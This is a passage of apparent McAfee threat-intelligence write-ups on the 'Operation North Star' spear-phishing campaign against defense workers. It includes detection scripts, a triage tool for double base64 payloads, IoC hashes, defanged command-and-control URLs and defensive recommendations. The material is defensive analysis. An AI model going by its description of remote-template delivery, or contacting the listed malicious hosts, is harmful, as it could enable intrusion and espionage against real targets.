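     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},  # benign, constructed
    {"id": 3, "image": r"C:\Windows\System32\rundll32.exe",
     "dest_host": "www.elite4print.com", "dest_port": 80},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "www.example.org", "dest_port": 443},  # benign, constructed
    {"id": 11, "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsdts.lnk"},
    {"id": 11, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "target": r"C:\Users\user\Documents\report.docx"},  # benign, constructed
]

# rundll32 <module>,<export> <args...>; the module path may be quoted.
RUNDLL32_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+(?:"([^"]+)"|([^\s,]+))\s*,\s*(\S+)', re.I)
NORMAL_MODULE_EXT = {".dll", ".cpl", ".ocx", ".ax"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def basename(path):
    return PureWindowsPath(path).name.lower()


def parse_rundll32(cmdline):
    """Return (module_path, export_name, [extra args]) or None."""
    m = RUNDLL32_RE.search(cmdline)
    if not m:
        return None
    module = m.group(1) or m.group(2)
    return module, m.group(3), cmdline[m.end():].split()


def check_process(ev):
    """Rule 1: rundll32 loading a module that does not look like a DLL,
    lives under the user profile, or was spawned by an Office application."""
    if ev["id"] != 1 or basename(ev["image"]) != "rundll32.exe":
        return []
    parsed = parse_rundll32(ev["cmdline"])
    if parsed is None:
        return []
    module, export, args = parsed
    reasons = []
    ext = PureWindowsPath(module).suffix.lower()
    if ext not in NORMAL_MODULE_EXT:
        reasons.append(f"module extension {ext!r} is not a DLL-style extension")
    if "\\appdata\\" in module.lower():
        reasons.append("module loaded from the user's AppData tree")
    if basename(ev["parent"]) in OFFICE_APPS:
        reasons.append("spawned by an Office application")
    if not reasons:
        return []
    detail = f"{module} export={export} argc={len(args)}: " + "; ".join(reasons)
    return [("rundll32_suspicious_module", detail)]


def check_network(ev):
    """Rule 2: rundll32 itself opening an outbound connection (the implant
    beacons from inside rundll32, whatever User-Agent string it copies)."""
    if ev["id"] == 3 and basename(ev["image"]) == "rundll32.exe":
        return [("rundll32_network", f"{ev['dest_host']}:{ev['dest_port']}")]
    return []


def check_file(ev):
    """Rule 3: a .lnk written into a Startup folder by anything other
    than explorer.exe (the persistence step described above)."""
    if ev["id"] != 11:
        return []
    target = ev["target"].lower()
    if "\\startup\\" in target and target.endswith(".lnk") \
            and basename(ev["image"]) != "explorer.exe":
        return [("startup_lnk_write", f"{ev['target']} by {basename(ev['image'])}")]
    return []


def analyze(events):
    """Apply all rules; returns a list of (rule_name, detail) alerts."""
    alerts = []
    for ev in events:
        alerts += check_process(ev) + check_network(ev) + check_file(ev)
    return alerts


if __name__ == "__main__":
    for rule, detail in analyze(EVENTS):
        print(f"[{rule}] {detail}")
```

Rule 1 fires on the implant’s command line for three independent reasons (a .db module, a path under AppData, and a Word parent), so any one of them could be dropped to reduce noise without losing the detection; rule 2 will also see legitimate rundll32 network activity on some builds and is best treated as a review signal rather than an automatic block.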

Additional Lures: Relationship to 2020 Diplomatic and Political Campaign

Further investigation into the 2020 campaign activity revealed additional links indicating the adversary was using domestic South Korean politics as lures. The adversary created several documents in the Korean language using the same techniques as the ones seen in the defense industry lures. One notable document, with the title US-ROK Relations and Diplomatic Security in both Korean and English, appeared on 6 April 2020 with the document author JangSY.

US-ROK Relation and Diplomatic Security

The document was hosted on the file sharing site hxxps://web.opendrive.com/api/v1/download/file.json/MzBfMjA1Njc0ODhf?inline=0 and contained an embedded link referring to a remote DOTM file hosted on another file sharing site (od.lk). The BASE64 coded value MzBfMjA1Njc0ODhf is a unique identifier for the user associated with the file sharing platform od.lk.

A related document discovered with the title test.docx indicated that the adversary began testing these documents in early April 2020. This document contained the same content as the above but was designed to test the downloading of the remote template file by hosting it on a private IP address. The document that utilized pubmaterial.dotm for its remote template also made requests to the URL hxxp://saemaeul.mireene.com/skin/visit/basic/.

This domain (saemaeul.mireene.com) is connected to numerous other Korean language malicious documents that also appeared in 2020 including documents related to political or diplomatic relations. One such document (81249fe1b8869241374966335fd912c3e0e64827) was using the 21st National Assembly Election as part of the title, potentially indicating those interested in politics in South Korea were a target. For example, another document (16d421807502a0b2429160e0bd960fa57f37efc4) used the name of an individual, director Jae-chun Lee. It also shared the same metadata.

The original author of these documents was listed as Seong Jin Lee according to the embedded metadata information. However, the last modification author (Robot Karll) used by the adversary during document template creation is unique to this set of malicious documents. Further, these documents contain political lures pertaining to South Korean domestic policy, which suggests that the targets of these documents also spoke Korean.

Relationship to 2019 Falsified Job Recruitment Campaign

A short-lived campaign from 2019 that used India’s aerospace industry as a lure employed methods very similar to this latest campaign built around the defense industry in 2020. Some of the TTPs from the 2020 campaign match those of the operation in late 2019. The 2019 activity has also been attributed to Hidden Cobra by industry reporting.

The campaign from October 2019 also used aerospace and defense as a lure, using copies of legitimate jobs just as we observed with the 2020 campaign. However, this campaign was isolated to the Indian defense sector and, to our knowledge, did not expand beyond it. The document contained a job posting for a leading aeronautics company in India that focuses on aerospace and defense systems. This targeting aligns with the 2020 operation, and our analysis reveals that the DLLs used in this campaign were also modified SQLite DLLs.

Based on our analysis, several variants of the implant were created in the October 2019 timeframe, indicating the possibility of additional malicious documents.

SHA1                                      Compile date  File name
f3847f5de342632f8f9e2901f16b7127472493ae  10/12/2019    MFC_dll.DLL
659c854bbdefe692ee8c52761e7a8c7ee35aa56c  10/12/2019    MFC_dll.DLL
35577959f79966b01f520e2f0283969155b8f8d7  10/12/2019    MFC_dll.DLL
975ae81997e6cd8c8a3901308d33c868f23e638f  10/12/2019    MFC_dll.DLL

One notable difference from the 2019 campaign is that its main malicious document contained the implant payload, unlike the 2020 campaign, which relied on the Microsoft Office remote template injection technique. Even though the delivery technique is different, we observed likenesses as we dissected the remote template document. There are some key similarities within the VBA code embedded in the documents. Below we see the 2019 (left) and 2020 (right) side-by-side comparison of two essential functions within the VBA code that extracts, drops and executes the payload; the two closely match each other.

VBA code of 13c47e19182454efa60890656244ee11c76b4904 (left) and acefc63a2ddbbf24157fc102c6a11d6f27cc777d (right)

The VBA macro drops the first payload, thumbnail.db, at a file path that resembles the one used in 2020.

The VBA code also passes the decryption key to the DLL payload, thumbnail.db. Below you can see the code within thumbnail.db accepting those parameters.

Unpacked thumbnail.db bff1d06b9ef381166de55959d73ff93b

What is interesting is the structure in which this information is being passed over. This 2019 sample is identical to what we documented within the 2020 campaign.

Another resemblance discovered was the position of the .dll implant existing in the exact same location for both 2019 and 2020 samples; “o” field under “UserForms1”.

“o” field of 13c47e19182454efa60890656244ee11c76b4904

All 2020 .dotm IoCs contain the same .dll implant within the “o” field under “UserForms1”, however, to not overwhelm this write-up with separate screenshots, only one sample is depicted below. Here you can see the parallel between both 2019 and 2020 “o” sections.

“o” field of acefc63a2ddbbf24157fc102c6a11d6f27cc777d

Another similarity is the double base64 encoding, though in the spirit of analysis of competing hypotheses we note that other adversaries may also use this type of encoding. However, when these similarities are coupled with the same lure of an Indian defense contractor, the pendulum starts to lean toward a possible common author behind both campaigns. This may indicate another technique being added to the adversary’s arsenal of attack vectors.

One method to keep the campaign dynamic and more difficult to detect is hosting implant code remotely. There is one disadvantage of embedding an implant within a document sent to a victim; the implant code could be detected before the document even reaches the victim’s inbox. Hosting it remotely enables the implant to be easily switched out with new capabilities without running the risk of the document being classified as malicious.

**-HAL-MANAGER.doc UserForm1 with double base64 encoded DLL

17.DOTM UserForm1 with double base64 encoded DLL from ******_DSS_SE.docx

According to a code similarity analysis, the implant embedded in **-HAL-Manager.doc contains some similarities to the implants from the 2020 campaign. However, we believe that the implant utilized in the 2019 campaign associated with **-Hal-Manager.doc may be another component. First, besides the evident similarities in the Visual Basic macro code and the method for encoding (double base64) there are some functional level similarities. The DLL file is run in a way with similar parameters.

DLL execution code **-Hal-Manager.doc implant

DLL execution code 2020 implant
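Both the 2019 and 2020 lures carry the implant as a double base64-encoded blob in the “o” field of UserForm1. The following added example (not McAfee’s code and not material from the campaign) shows the triage step an analyst performs on that stream: it peels an arbitrary number of base64 layers, stops at the first PE header, and reads the COFF header so that machine type, section count, compile timestamp and the DLL flag are available without ever loading the binary. It generalises the page’s two-layer case to any number of layers. The embedded sample stream is a constructed PE-shaped stand-in, not an implant; its timestamp is set to the 12 October 2019 compile date from the table above purely to illustrate the check.

```python
"""Triage of a double base64-encoded payload as found in the UserForm "o"
field. Added example, not McAfee's or the adversary's code; the sample
stream below is a constructed PE-shaped blob, not an implant."""
import base64
import binascii
import hashlib
import re
import struct

IMAGE_FILE_DLL = 0x2000  # COFF Characteristics flag


def peel_base64(text, max_layers=4):
    """Base64-decode repeatedly (whitespace ignored) until an MZ header
    appears. Returns (pe_bytes, layers) or (None, layers_decoded)."""
    data = text.encode() if isinstance(text, str) else text
    for layer in range(1, max_layers + 1):
        try:
            data = base64.b64decode(re.sub(rb"\s+", b"", data), validate=True)
        except (binascii.Error, ValueError):
            return None, layer - 1
        if data[:2] == b"MZ":
            return data, layer
    return None, max_layers


def pe_summary(data):
    """Basic facts from the COFF header, or None if the image is malformed."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, timestamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
        "machine": hex(machine),
        "sections": nsections,
        "compile_timestamp": timestamp,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
    }


def triage(stream):
    """Peel the encoding layers and summarise the embedded PE."""
    data, layers = peel_base64(stream)
    return {"layers": layers, "pe": pe_summary(data) if data else None}


def build_fake_pe():
    """Constructed stand-in: MZ stub, e_lfanew -> PE signature, COFF header
    for an x64 DLL with 3 sections. Timestamp 1570838400 is 2019-10-12 UTC,
    chosen to mirror the compile dates in the table above."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664, 3, 1570838400, 0, 0, 0, 0x2002)
    return bytes(dos) + b"PE\0\0" + coff


def encode_layers(data, layers=2, width=76):
    """Apply `layers` base64 encodings, wrapping the outer text as the lure does."""
    for _ in range(layers):
        data = base64.b64encode(data)
    text = data.decode()
    return "\n".join(text[i:i + width] for i in range(0, len(text), width))


SAMPLE_STREAM = encode_layers(build_fake_pe())  # constructed "o" field content

if __name__ == "__main__":
    print(triage(SAMPLE_STREAM))
```

The SHA256 the summary returns is of the decoded image, which is what the indicator tables in this write-up list; hashing the encoded stream instead would never match a published indicator.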

Campaign Context: Victimology

The victimology is not exactly known due to the lack of spear phishing emails uncovered; however, we can obtain some insight from the analysis of telemetry information and lure document context. The lure documents contained job descriptions for engineering and project management positions in relationship to active defense contracts. The individuals receiving these documents in a targeted spear phishing campaign were likely to have an interest in the content within these lure documents, as we have observed in previous campaigns, as well as some knowledge or relationship to the defense industry.

Infrastructure Insights

Our analysis of the 2019 and 2020 campaigns reveals some interesting insight into the command and control infrastructure behind them, including domains hosted in Italy and the United States. During our investigation we observed a pattern of using legitimate domains to host command and control code. This is beneficial to the adversary as most organizations do not block trusted websites, which allows for the potential bypass of security controls. The adversary took the effort to compromise the domains prior to launching the actual campaign. Further, both 2019 and 2020 job recruitment campaigns shared the same command and control server hosted at elite4print.com.

The domain mireene.com and its various sub-domains have been used by Hidden Cobra in 2020. The sub-domains of mireene.com identified in various 2020 operations are:

  • saemaeul.mireene.com
  • orblog.mireene.com
  • sgmedia.mireene.com
  • vnext.mireene.com
  • nhpurumy.mireene.com
  • jmable.mireene.com
  • jmdesign.mireene.com
  • all200.mireene.com

Some of these campaigns use similar methods as the 2020 defense industry campaign:

  • Malicious document with the title European External Action Service [8]
  • Document with Korean language title 비건 미국무부 부장관 서신doc (U.S. Department of State Secretary of State Correspondence 20200302.doc).

Tactics, Techniques and Procedures (TTPs)

The TTPs of this campaign align with those of previous Hidden Cobra operations from 2017 using the same defense contractors as lures. The 2017 campaign also utilized malicious Microsoft Word documents containing job postings relating to certain technologies such as job descriptions for engineering and project management positions involving aerospace and military surveillance programs. These job descriptions are legitimate and taken directly from the defense contractor’s website. The exploitation method used in this campaign relies upon a remote Office template injection method, a technique that we have seen state actors use recently.

However, it is not uncommon to use tools such as EvilClippy to manipulate the behavior of Microsoft Office documents. For example, threat actors can use pre-built kits to manipulate clean documents and embed malicious elements; this saves time and effort. This method will generate a consistent format that can be used throughout campaigns. As a result, we have observed a consistency with how some of the malicious elements are embedded into the documents (i.e. double base64 encoded payload). Further mapping these techniques across the MITRE ATT&CK framework enables us to visualize different techniques the adversary used to exploit their victims.

MITRE ATT&CK mapping for malicious documents

These Microsoft Office templates are hosted on a command and control server, and the download link is embedded in the first-stage malicious document.

The job postings from these lure documents are positions for work with specific US defense programs and groups:

  • F-22 Fighter Jet Program
  • Defense, Space and Security (DSS)
  • Photovoltaics for space solar cells
  • Aeronautics Integrated Fighter Group
  • Military aircraft modernization programs

Like previous operations, the adversary is using these lures to target individuals, likely posing as a recruiter or someone involved in recruitment. Some of the job postings we have observed:

  • Senior Design Engineer
  • System Engineer

Professional networks such as LinkedIn could be a place used to deliver these types of job descriptions.

Defensive Architecture Recommendations

Defeating the tactics, techniques and procedures utilized in this campaign requires a defense in depth security architecture that can prevent or detect the attack in the early stages. The key controls in this case would include the following:

  1. Threat Intelligence Research and Response Program. It’s critical to keep up with the latest adversary campaigns targeting your specific vertical. A robust threat response process can then ensure that controls are adaptable to the TTPs and, in this case, create heightened awareness.
  2. Security Awareness and Readiness Program. The attackers leveraged spear-phishing with well-crafted lures that would be very difficult to detect initially by protective technology. Well-trained and ready users, informed with the latest threat intelligence on adversary activity, are the first line of defense.
  3. End User Device Security. Adaptable endpoint security is critical to stopping this type of attack early, especially for users working from home and not behind the enterprise web proxy or other layered defensive capability. Stopping or detecting the first two stages of infection requires an endpoint security capability of identifying file-less malware, particularly malicious Office documents and persistence techniques that leverage start-up folder modification.
  4. Web Proxy. A secure web gateway is an essential part of enterprise security architecture and, in this scenario, can restrict access to malicious web sites and block access to the command and control sites.
  5. Sec Ops – Endpoint Detection and Response (EDR) can be used to detect techniques most likely in stages 1, 2 or 4. Additionally, EDR can be used to search for the initial documents and other indicators provided through threat analysis.

For further information on how McAfee Endpoint Protection and EDR can prevent or detect some of the techniques used in this campaign, especially use of malicious Office documents, please refer to these previous blogs and webinar:

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ens-10-7-rolls-back-the-curtain-on-ransomware/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-to-use-mcafee-atp-to-protect-against-emotet-lemonduck-and-powerminer/
https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=video-6157567326001

Indicators of Compromise

SHA256                                                            File name
322aa22163954ff3ff017014e357b756942a2a762f1c55455c83fd594e844fdd  ******_DSS_SE.docx
a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063  ******_PMS.docx
d1e2a9367338d185ef477acc4d91ad45f5e6a7d11936c3eb4be463ae0b119185  ***_JD_2020.docx
ecbe46ca324096fd5e35729f39fa3bda9226bbefd6286d53e61b1be56a36de5b  ***_2020_JD_SDE.docx
40fbac7a241bea412734134394ca81c0090698cf0689f2b67c54aa66b7e04670  83878C91171338902E0FE0FB97A8C47A.dotm
6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1  ******_AERO_GS.docx
df5536c254a5d9ac626dbff7525de8301729807433d377db807ce3d8bc7c3ffe  **_IFG_536R.docx
1b0c82e71a53300c969da61b085c8ce623202722cf3fa2d79160dac16642303f  43.dotm
d7ef8935437d61c975feb2bd826d018373df099047c33ad7305585774a272625  17.dotm
49724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0  Senior_Design_Engineer.docx
66e5371c3da7dc9a80fb4c0fabfa23a30d82650c434eec86a95b6e239eccab88  61.dotm
7933716892e0d6053057f5f2df0ccadf5b06dc739fea79ee533dd0cec98ca971  ******_spectrolab.docx
43b6b0af744124da5147aba81a98bc7188718d5d205acf929affab016407d592  ***_ECS_EPM.docx
70f66e3131cfbda4d2b82ce9325fed79e1b3c7186bdbb5478f8cbd49b965a120  ******_dds_log.jpg
adcdbec0b92da0a39377f5ab95ffe9b6da9682faaa210abcaaa5bd51c827a9e1  21 국회의원 선거 관련.docx
dbbdcc944c4bf4baea92d1c1108e055a7ba119e97ed97f7459278f1491721d02  외교문서 관련(이재춘국장).docx


URLs
hxxps://www.anca-aste.it/uploads/form/02E319AF73A33547343B71D5CB1064BC.dotm
hxxp://www.elite4print.com/admin/order/batchPdfs.asp
hxxps://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm
hxxps://www.astedams.it/uploads/template/17.dotm
hxxps://www.sanlorenzoyacht.com/newsl/uploads/docs/1.dotm
hxxps://www.anca-aste.it/uploads/form/******_jd_t034519.jpg
hxxp://saemaeul.mireene.com/skin/board/basic/bin
hxxp://saemaeul.mireene.com/skin/visit/basic/log
hxxps://web.opendrive.com/api/v1/download/file.json/MzBfMjA1Njc0ODhf?inline=0
hxxps://od.lk/d/MzBfMjA1Njc0ODdf/pubmaterial.dotm
hxxps://www.ne-ba.org/files/gallery/images/83878C91171338902E0FE0FB97A8C47A.dotm
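As an added example (not McAfee tooling), the indicators above can be swept against endpoint and proxy data exported to a SIEM. The script below refangs the defanged URLs, matches file hashes from an endpoint inventory, matches proxy entries first by exact URL and then by indicator host, and also flags the generic pattern this campaign relies on, an Office process fetching a remote .dotm template, which catches a new lure before its URL is published. The inventory records, proxy log lines, host and user names and the process column are constructed; the hashes and URLs are a subset of the indicators listed above.

```python
"""Sweep of the Operation North Star indicators over constructed endpoint
inventory and proxy data. Added example, not McAfee tooling. The hashes
and URLs are a subset of the indicators listed above; inventory records,
proxy log lines, host/user names and process names are constructed."""
import re

IOC_SHA256 = {  # sha256 -> file name, from the indicator table above
    "322aa22163954ff3ff017014e357b756942a2a762f1c55455c83fd594e844fdd": "******_DSS_SE.docx",
    "66e5371c3da7dc9a80fb4c0fabfa23a30d82650c434eec86a95b6e239eccab88": "61.dotm",
    "d7ef8935437d61c975feb2bd826d018373df099047c33ad7305585774a272625": "17.dotm",
}
IOC_URLS = [  # defanged, as published above
    "hxxps://www.astedams.it/uploads/template/17.dotm",
    "hxxp://www.elite4print.com/admin/order/batchPdfs.asp",
    "hxxp://saemaeul.mireene.com/skin/visit/basic/log",
    "hxxps://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm",
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
TEMPLATE_EXT = (".dotm", ".dotx", ".dot")


def refang(url):
    """Turn a defanged hxxp(s):// indicator back into a matchable URL."""
    return re.sub(r"^hxxp", "http", url, flags=re.I)


def host_of(url):
    """Lower-cased host part of a (possibly defanged) URL, '' if unparsable."""
    m = re.match(r"https?://([^/:?#]+)", refang(url), re.I)
    return m.group(1).lower() if m else ""


IOC_URL_SET = {refang(u).lower() for u in IOC_URLS}
IOC_HOSTS = {host_of(u) for u in IOC_URLS}

# Constructed endpoint inventory: (host, path, sha256). The first hash is the
# published indicator for the DSS lure; the second is a made-up benign value.
FILE_INVENTORY = [
    ("host-a", r"C:\Users\user1\Downloads\job_description.docx",
     "322aa22163954ff3ff017014e357b756942a2a762f1c55455c83fd594e844fdd"),
    ("host-b", r"C:\Users\user2\Documents\budget.xlsx", "00" * 32),
]

# Constructed proxy log: time host user method url status process
PROXY_LOG = """\
2020-06-15T09:12:03Z host-a user1 GET https://www.astedams.it/uploads/template/17.dotm 200 winword.exe
2020-06-15T09:12:05Z host-a user1 GET http://www.elite4print.com/admin/order/batchPdfs.asp 200 rundll32.exe
2020-06-15T09:14:10Z host-b user2 GET https://www.example.com/index.html 200 firefox.exe
2020-06-15T09:14:31Z host-a user1 GET http://saemaeul.mireene.com/skin/visit/basic/ 200 rundll32.exe
2020-06-15T09:15:44Z host-c user3 GET https://files.example.net/templates/quarter.dotm 200 winword.exe
"""


def sweep_hashes(inventory):
    """Exact SHA256 matches against the published file indicators."""
    hits = []
    for host, path, sha256 in inventory:
        name = IOC_SHA256.get(sha256.lower())
        if name:
            hits.append({"host": host, "path": path, "ioc_name": name})
    return hits


def sweep_proxy(log):
    """Match proxy entries by exact URL, then by indicator host, and finally
    flag the generic remote-template pattern (Office fetching a .dotm)."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue  # skip malformed lines rather than mis-assign columns
        ts, host, user, _method, url, _status, proc = parts
        url_l, proc_l = url.lower(), proc.lower()
        if url_l in IOC_URL_SET:
            rule = "ioc_url"
        elif host_of(url) in IOC_HOSTS:
            rule = "ioc_host"
        elif proc_l in OFFICE_APPS and url_l.endswith(TEMPLATE_EXT):
            rule = "remote_template_fetch"
        else:
            continue
        hits.append({"rule": rule, "time": ts, "host": host, "user": user,
                     "url": url, "process": proc})
    return hits


def sweep(inventory, log):
    return {"files": sweep_hashes(inventory), "proxy": sweep_proxy(log)}


if __name__ == "__main__":
    for section, items in sweep(FILE_INVENTORY, PROXY_LOG).items():
        for item in items:
            print(section, item)
```

Host-level matches deserve care here: several of the indicator hosts are compromised legitimate sites, so an ioc_host hit is a prompt to review the full URL and the requesting process rather than proof of infection on its own.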

Conclusion

In summary, ATR has been tracking a targeted campaign focusing on the aerospace and defense industries using false job descriptions. Based on shared TTPs, this campaign looks very similar to a campaign that occurred in 2017 and also targeted some of the same industry. This campaign began in early April 2020 with the latest activity in mid-June. The campaign’s objective is to collect information from individuals connected to the industries in the job descriptions.

Additionally, our forensic research into the malicious documents shows they were created by the same adversary, using Korean and English language systems. Further, the discovery of legitimate template files used to build these documents also sheds light on some of the initial research put into the development of this campaign. While McAfee ATR has observed these techniques before, in previous campaigns in 2017 and 2019 using the same TTPs, we can conclude there has been an increase in activity in 2020.

McAfee detects these threats as:

  • Trojan-FRVP!2373982CDABA
  • Generic Dropper.aou
  • Trojan-FSGY!3C6009D4D7B2
  • Trojan-FRVP!CEE70135CBB1
  • W97M/Downloader.cxu
  • Trojan-FRVP!63178C414AF9
  • Exploit-cve2017-0199.ch
  • Trojan-FRVP!AF83AD63D2E3
  • RDN/Generic Downloader.x
  • W97M/Downloader.bjp
  • W97M/MacroLess.y

NSP customers will have new signatures added to the “HTTP: Microsoft Office OLE Arbitrary Code Execution Vulnerability (CVE-2017-0199)” attack name. The updated attack is part of our latest NSP sigset release: sigset 10.8.11.9, released on 28th July 2020. The KB details can be found here: KB55446

[1] https://www.bbc.co.uk/news/business-53026175

[2] https://www.welivesecurity.com/2020/06/17/operation-interception-aerospace-military-companies-cyberspies/

[3] https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and

[4] https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and

5 https://www.us-cert.gov/northkorea

[5] https://www.virustotal.com/gui/file/4a08c391f91cc72de7a78b5fd5e7f74adfecd77075e191685311fa598e07d806/detection – Gamaredon Group

[6] https://docs.microsoft.com/en-us/openspecs/office_standards/ms-docx/550efe71-4f40-4438-ac89-23ec1c1d2182

[7] https://www.welivesecurity.com/2020/06/17/operation-interception-aerospace-military-companies-cyberspies/

[8] https://otx.alienvault.com/pulse/5e8619b52e480b485e58259a

McAfee Defender’s Blog: Operation North Star Campaign
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-operation-north-star-campaign/
Thu, 30 Jul 2020 04:01:23 +0000


Building Adaptable Security Architecture Against the Operation North Star Campaign

Operation North Star Overview

Over the last few months, we have seen attackers take advantage of the pandemic as cover to launch cyberattacks. One such example is a campaign in which McAfee Advanced Threat Research (ATR) observed an increase in malicious cyber activity targeting the Aerospace & Defense industry. In this campaign McAfee ATR discovered a series of malicious documents containing job postings taken from leading defense contractors, used as lures in a very targeted fashion. This type of campaign has appeared before, in 2017 and 2019, using similar techniques, but the 2020 campaign has some distinct differences in implants, infrastructure and spear phishing lures. For a more detailed analysis of this campaign please see the McAfee ATR blog.

This blog is focused on how to build an adaptable security architecture to increase your resilience against these types of attacks and specifically, how McAfee’s portfolio delivers the capability to prevent, detect and respond against the tactics and techniques used in the Operation North Star campaign.

Gathering Intelligence on Operation North Star

As always, building an adaptable defensive architecture starts with intelligence. In most organizations, the Security Operations team is responsible for threat intelligence analysis, as well as threat and incident response. McAfee Insights (https://www.mcafee.com/enterprise/en-us/lp/insights-dashboard1.html#) is a useful tool for the threat intel analyst and threat responder. The Insights Dashboard identifies the prevalence and severity of emerging threats across the globe, which enables the Security Operations Center (SOC) to prioritize threat response actions and gather relevant cyber threat intelligence (CTI) associated with the threat, in this case the Operation North Star campaign. The CTI is provided in the form of technical Indicators of Compromise (IOCs) as well as MITRE ATT&CK framework tactics and techniques. As a threat intel analyst or responder, you can drill down to gather more specific information on Operation North Star, such as prevalence and links to other sources of information, and further into actionable intelligence such as indicators of compromise and the tactics and techniques aligned to the MITRE ATT&CK framework.

From the McAfee ATR blog, you can see that Operation North Star leverages tactics and techniques common to other APT campaigns, such as spear phishing for Initial Access, exploited system tools and signed binaries, modification of Registry Keys/Startup folder for persistence and encoded traffic for command and control.

Defensive Architecture Overview

Today’s digital enterprise is a hybrid environment of on-premise systems and cloud services with multiple entry points for attacks like Operation North Star. The work from home operating model forced by COVID-19 has only expanded the attack surface and increased risk for successful spear phishing attacks if organizations did not adapt their security posture and increase training for remote workers. Mitigating the risk of attacks like Operation North Star requires a security architecture with the right controls at the device, on the network and in security operations (sec ops). The Center for Internet Security (CIS) Top 20 Cyber Security Controls provides a good guide to build that architecture. The following outlines the key security controls needed at each layer of the architecture to protect your enterprise against Operation North Star tactics and techniques.

Initial Access Stage Defensive Overview

According to Threat Intelligence and Research, the initial access is performed either through vulnerability exploitation or spear phishing attachments. As attackers can quickly change spear phishing attachments or link locations, it is important to have layered defenses that include user awareness training and response procedures, intelligence and behavior-based malware defenses on email systems, web proxy and endpoint systems, and finally sec ops playbooks for early detection and response against suspicious email attachments or other phishing techniques. The following chart summarizes the controls expected to have the most effect against initial stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic | MITRE Technique | CSC Controls | McAfee Capability
Initial Access | Spear Phishing Attachments (T1566.001) | CSC 7 Email and Web Browser Protection; CSC 8 Malware Defenses; CSC 17 User Awareness | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)
Initial Access | Spear Phishing Link (T1566.002) | CSC 7 Email and Web Browser Protection; CSC 8 Malware Defenses; CSC 17 User Awareness | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)
Initial Access | Spear Phishing via Service (T1566.003) | CSC 7 Email and Web Browser Protection; CSC 8 Malware Defenses; CSC 17 User Awareness | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

For additional information on how McAfee can protect against suspicious email attachments, review this additional blog post.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-protects-against-suspicious-email-attachments/

Exploitation Stage Defensive Overview

The exploitation stage is where the attacker gains access to the target system. Protection against Operation North Star at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, restriction of application execution, and security operations tools like endpoint detection and response sensors.

McAfee Endpoint Security 10.7 provides a defense in depth capability including signatures and threat intelligence to cover known bad indicators or programs, as well as machine-learning and behavior-based protection to reduce the attack surface against Operation North Star and detect new exploitation attack techniques. This attack leverages weaponized documents with links to external template files on a remote server. McAfee Threat Prevention and Adaptive Threat Protection modules protect against these techniques.

Additionally, MVISION EDR provides proactive detection capability on Execution and Defensive Evasion techniques identified in the exploit stage analysis. Please read further to see MVISION EDR in action against Operation North Star.

The following chart summarizes the critical security controls expected to have the most effect against exploitation stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic | MITRE Technique | CSC Controls | McAfee Portfolio Mitigation
Execution | User Execution (T1204) | CSC 5 Secure Configuration; CSC 8 Malware Defenses; CSC 17 Security Awareness | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), Web Gateway and Network Security Platform
Execution | Command and Scripting Interpreter (T1059) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Execution | Shared Modules (T1129) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC)
Persistence | Boot or Autologon Execution (T1547) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7 Threat Prevention, MVISION EDR
Defense Evasion | Template Injection (T1221) | CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR
Defense Evasion | Signed Binary Proxy Execution (T1218) | CSC 4 Control Admin Privileges; CSC 5 Secure Configuration; CSC 8 Malware Defenses | Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control, MVISION EDR
